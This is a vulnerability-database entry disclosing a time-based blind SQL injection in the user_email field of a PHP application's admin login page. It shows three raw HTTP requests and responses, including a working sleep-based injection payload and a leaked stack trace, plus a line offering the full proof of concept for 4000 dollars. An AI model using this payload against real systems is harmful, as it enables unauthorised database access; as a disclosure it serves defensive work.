Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
attackerkbAttackerKBAKB:0B4D3ED3-FC04-45FE-B2D9-5E91FC41FAD2
HistoryOct 18, 2021 - 12:00 a.m.

CVE-nu11-101821

2021-10-1800:00:00
attackerkb.com
16
JSON

Description:

The user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind.
A single quote was submitted in the user_email parameter, and a general error message was returned.
Two single quotes were then submitted and the error message disappeared.

Recent assessments:

nu11secur1ty at October 18, 2021 2:08pm UTC reported:

CVE-nu11-101821

Vendor

MySQL Request-1:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

[email protected]'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e

MySQL Response-1:

Response 1
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8





<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...

MySQL Request-2:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

[email protected]''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e

MySQL Response-2

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8





<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

MySQL Request-3

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e

MySQL Response-3

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8





<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

Price for decrypting of the PoC:

4000$

Reproduce

href

Proof:

href

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5

JSON